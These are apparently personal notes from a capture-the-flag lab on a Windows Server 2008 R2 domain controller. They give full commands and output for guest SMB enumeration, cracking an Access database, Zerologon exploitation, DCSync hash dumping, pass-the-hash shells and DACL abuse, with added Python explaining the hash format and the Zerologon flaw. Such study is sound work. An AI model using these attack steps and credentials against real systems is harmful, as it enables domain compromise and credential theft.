Retro2
This is not a writeup, just my notes about the machine.
Machine information

Operating System: Windows Server 2008 R2 Datacenter 7601 Service Pack 1
Chain: False (standalone compromise)
Credentials

| Username | Password | Method | Scope |
| --- | --- | --- | --- |
| Public_DB_staff.accdb | class08 | Bruteforce attack | Microsoft Access Database |
| ldapreader | ppYaVcB5R | Inside the Microsoft Access Database file | Domain User |
✅ Valid Usernames
laura.davies
rhys.richards
leah.robinson
michelle.bird
kayleigh.stephenson
charles.singh
sam.humphreys
margaret.austin
caroline.james
lynda.giles
emily.price
lynne.dennis
alexandra.black
alex.scott
mandy.davies
marilyn.whitehouse
lindsey.harrison
sally.davey
admws01$
inventory
services
ldapreader
fs01$
fs02$
🔑 Passwords list
class08
ppYaVcB5R
Information Gathering
Service enumeration
DNS
Not vulnerable to DNS AXFR
SMB (enum4linux-ng)
Server allows null session
Server allows guest session
RID Bruteforce attack retrieved a list of valid users
Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Obsolete)
Vulnerable to Zerologon
Initial Enumeration
Discovering a password-protected Microsoft Access database on the Public share (guest session: arbitrary username with an empty password)
nxc smb 10.10.120.69 -u 'Intrusionz3r0' -p '' --shares -M spider_plus
{
"Public": {
"DB/staff.accdb": {
"atime_epoch": "2024-08-17 08:07:06",
"ctime_epoch": "2024-08-17 08:06:49",
"mtime_epoch": "2024-08-17 10:30:34",
"size": "856 KB"
}
}
}
Brute-forcing the database hash and obtaining the plaintext password
office2john 10.10.120.69-Public_DB_staff.accdb > database_hash
❯ hashcat -m 9600 database_hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
<SNIP>
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
<SNIP>
$office$*2013*100000*256*16*5736cfcbb054e749a8f303570c5c1970*1ec683f4d8c4e9faf77d3c01f2433e56*7de0d4af8c54c33be322dbc860b68b4849f811196015a3f48a424a265d018235:class08
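The $office$ line above is the hash format office2john emits and hashcat consumes. As an added example (not part of these notes, and not code from office2john or hashcat), the parser below splits such a line into its fields, validates the declared sizes against the hex payload, picks the hashcat mode from the Office version, and strips the `<file>:` prefix office2john adds and the `:<password>` suffix hashcat appends to a cracked line. The 2013 sample is the hash from these notes; the 2007 hash in the usage is constructed.

```python
"""Parse $office$ hashes (office2john output) and pick the hashcat mode.

Added example for these notes; it is neither the page's code nor part of
office2john or hashcat. SAMPLE is the hash cracked above.
"""
from dataclasses import dataclass

# hashcat modes for the Office encryption generations office2john reports.
HASHCAT_MODES = {"2007": 9400, "2010": 9500, "2013": 9600}

SAMPLE = ("$office$*2013*100000*256*16*5736cfcbb054e749a8f303570c5c1970"
          "*1ec683f4d8c4e9faf77d3c01f2433e56"
          "*7de0d4af8c54c33be322dbc860b68b4849f811196015a3f48a424a265d018235")


@dataclass(frozen=True)
class OfficeHash:
    version: str
    spin_count: int        # key-derivation iterations, i.e. the cost of each guess
    key_bits: int
    salt: bytes
    verifier_input: bytes  # encrypted verifier, exactly one AES block
    verifier_hash: bytes   # encrypted hash of the verifier

    @property
    def hashcat_mode(self) -> int:
        return HASHCAT_MODES[self.version]


def split_john_line(line: str):
    """office2john prints '<file>:$office$...'; a cracked hashcat line appends
    ':<password>'. Return (hash, password_or_None)."""
    line = line.strip()
    start = line.find("$office$")
    if start < 0:
        raise ValueError("no $office$ hash on this line")
    body = line[start:]
    # The hash itself never contains ':', so anything after the first one is
    # the cracked password (which may itself contain ':').
    hash_part, sep, password = body.partition(":")
    return hash_part, (password if sep else None)


def parse_office_hash(line: str) -> OfficeHash:
    """Parse one line, checking that the payload matches the declared sizes."""
    hash_part, _ = split_john_line(line)
    parts = hash_part.split("*")
    if len(parts) != 8 or parts[0] != "$office$":
        raise ValueError("malformed $office$ hash")
    version = parts[1]
    if version not in HASHCAT_MODES:
        raise ValueError(f"unsupported Office version {version}")
    spin_count, key_bits, salt_size = int(parts[2]), int(parts[3]), int(parts[4])
    if spin_count <= 0 or key_bits not in (128, 256):
        raise ValueError("implausible spin count or key size")
    salt, verifier_input, verifier_hash = (bytes.fromhex(p) for p in parts[5:8])
    if len(salt) != salt_size:
        raise ValueError("salt length does not match the declared salt size")
    if len(verifier_input) != 16:
        raise ValueError("encrypted verifier must be one AES block")
    return OfficeHash(version, spin_count, key_bits, salt, verifier_input, verifier_hash)


def hashcat_argv(h: OfficeHash, hash_file: str, wordlist: str, john_format: bool = False):
    """Command line for hashcat; --username is required when the file still
    carries the '<file>:' prefix office2john writes."""
    argv = ["hashcat", "-m", str(h.hashcat_mode)]
    if john_format:
        argv.append("--username")
    return argv + [hash_file, wordlist]


if __name__ == "__main__":
    h = parse_office_hash("10.10.120.69-Public_DB_staff.accdb:" + SAMPLE)
    print(h.version, h.spin_count, h.key_bits, "-> hashcat mode", h.hashcat_mode)
    print(" ".join(hashcat_argv(h, "database_hash", "/usr/share/wordlists/rockyou.txt", True)))
```

The size checks matter in practice: a hash whose salt does not match its declared size, or whose verifier is not one AES block, has been truncated by copy-paste and will be rejected by hashcat with a token-length error rather than silently fail to crack.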
Moving the file to my machine and viewing its contents: the database holds an LDAP connection string with hard-coded bind credentials
strLDAP = "LDAP://OU=staff,DC=retro2,DC=vl"
strUser = "retro2\ldapreader"
strPassword = "ppYaVcB5R"
Exploitation
Path: Zerologon
nxc smb 10.10.120.69 -u 'ldapreader' -p 'ppYaVcB5R' -M zerologon
SMB 10.10.120.69 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB 10.10.120.69 445 BLN01 [+] retro2.vl\ldapreader:ppYaVcB5R
ZEROLOGON 10.10.120.69 445 BLN01 VULNERABLE
ZEROLOGON 10.10.120.69 445 BLN01 Next step: https://github.com/dirkjanm/CVE-2020-1472
Abusing the zerologon vulnerability
python3 cve-2020-1472-exploit.py BLN01 10.10.120.69
Performing authentication attempts...
==================== <SNIP: one "=" is printed per authentication attempt>
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete!
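The run of "=" above is the exploit retrying the Netlogon authentication with an all-zero client challenge until the server happens to accept an all-zero credential, which works for roughly one session key in 256. The following is an added example (not from these notes and not from the exploit script) that shows why: ComputeNetlogonCredential runs AES-CFB8 with a fixed all-zero IV. It implements CFB8 itself; to run without third-party packages, the AES block function is replaced by a stand-in 16-byte function built from SHA-256 (an assumption made here; the structural argument only needs a fixed per-key block function).

```python
"""Why Zerologon (CVE-2020-1472) works: AES-CFB8 with an all-zero IV turns an
all-zero challenge into an all-zero credential for about 1 in 256 session keys.

Added example for these notes, not the page's or the exploit's code. The AES
block function is replaced by a SHA-256 based stand-in (assumption).
"""
import hashlib

BLOCK = 16            # AES block size, also the size of the CFB8 shift register
CHALLENGE = bytes(8)  # the all-zero client challenge the exploit sends


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in for AES-128 encryption of one block (assumption, see above)."""
    return hashlib.sha256(key + block).digest()[:BLOCK]


def cfb8_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """CFB with an 8-bit segment: each ciphertext byte is plaintext XOR the
    first byte of E(shift register); the ciphertext byte is then shifted in."""
    shift = bytearray(iv)
    out = bytearray()
    for p in data:
        keystream = block_encrypt(key, bytes(shift))[0]
        c = p ^ keystream
        out.append(c)
        shift = shift[1:] + bytes([c])
    return bytes(out)


def netlogon_credential(session_key: bytes, challenge: bytes) -> bytes:
    """ComputeNetlogonCredential (AES flavour): CFB8 with a fixed all-zero IV.
    The fixed IV is the flaw; a random IV per call would remove it."""
    return cfb8_encrypt(session_key, bytes(BLOCK), challenge)


def zero_credential_expected(session_key: bytes) -> bool:
    """With IV = 0 and plaintext = 0 the shift register stays all-zero as long
    as the keystream byte is 0, so the whole credential is zero exactly when the
    first byte of E(0^16) is zero: probability 1/256 per session key."""
    return block_encrypt(session_key, bytes(BLOCK))[0] == 0


def count_zero_credentials(n_keys: int) -> int:
    """Simulate the exploit's retry loop over n_keys distinct session keys and
    count how many would make the server accept the all-zero credential."""
    hits = 0
    for k in range(n_keys):
        key = k.to_bytes(BLOCK, "big")
        if netlogon_credential(key, CHALLENGE) == bytes(8):
            hits += 1
    return hits


if __name__ == "__main__":
    n = 8192
    print(f"{count_zero_credentials(n)}/{n} session keys accept the all-zero credential (about 1/256 expected)")
```

Each retry uses a fresh session key because the key is derived from the server challenge, which changes per attempt; once an attempt is accepted, the same zero-key trick is used to call NetrServerPasswordSet2 with an empty password, which is what "changing account password to empty string" above refers to.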
Performing DCSync attack
❯ impacket-secretsdump 'BLN01$'@10.10.120.69 -no-pass -just-dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c06552bdb50ada21a7c74536c231b848:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1e242a90fb9503f383255a4328e75756:::
Caveat: the exploit overwrote the BLN01$ password stored in AD with an empty one while the DC's local LSA secret still holds the old one, so the DC's own Netlogon channel (and with it replication) is broken until it is restored. Dump the original value from the DC's LSA secrets (secretsdump against the DC with the Administrator hash and without -just-dc prints $MACHINE.ACC as plain_password_hex) and put it back with restorepassword.py from the same repository.
Obtaining a shell as Administrator
❯ impacket-wmiexec retro2.vl/Administrator@10.10.120.69 -hashes :c06552bdb50ada21a7c74536c231b848
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
retro2\administrator
C:\>
Path: DACLs
Visualizing the attack path

Discovering a pre-Windows 2000 computer account: its password defaults to the lowercase computer name without the trailing $, and STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT (rather than STATUS_LOGON_FAILURE) shows the password was accepted but the account is not yet allowed to log on with it
nxc smb 10.10.120.69 -u 'FS01$' -p 'fs01'
SMB 10.10.120.69 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB 10.10.120.69 445 BLN01 [-] retro2.vl\FS01$:fs01 STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
Changing the default password (the account may change its own password over SAMR even before it is allowed to log on)
❯ impacket-changepasswd retro2.vl/'FS01$':'fs01'@10.10.120.69 -p rpc-samr
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
New password:
Retype new password:
[*] Changing the password of retro2.vl\FS01$
[*] Connecting to DCE/RPC as retro2.vl\FS01$
[*] Password was changed successfully.
Abusing GenericWrite over ADMWS01$ (resetting another account's password requires the User-Force-Change-Password extended right, which GenericAll includes; the reset succeeding shows FS01$ holds that right on ADMWS01$)
❯ bloodyAD -u 'FS01$' -p 'password123' -d retro2.vl --dc-ip 10.10.120.69 set password 'ADMWS01$' 'password123'
[+] Password changed successfully!
Adding ldapreader to the services group (ADMWS01$ can modify its membership), which is what gives ldapreader RDP access to the DC
❯ bloodyAD -u 'ADMWS01$' -p 'password123' -d retro2.vl --dc-ip 10.10.120.69 add groupMember services ldapreader
[+] ldapreader added to services
❯ xfreerdp /v:10.10.120.69 /u:ldapreader /p:ppYaVcB5R /d:retro2.vl /tls-seclevel:0

Privilege Escalation
RpcEptMapper exploit (local privilege escalation specific to Windows 7 / Server 2008 R2: the RpcEptMapper service's registry key has weak permissions that let a standard user add a Performance subkey pointing at an attacker-controlled DLL)
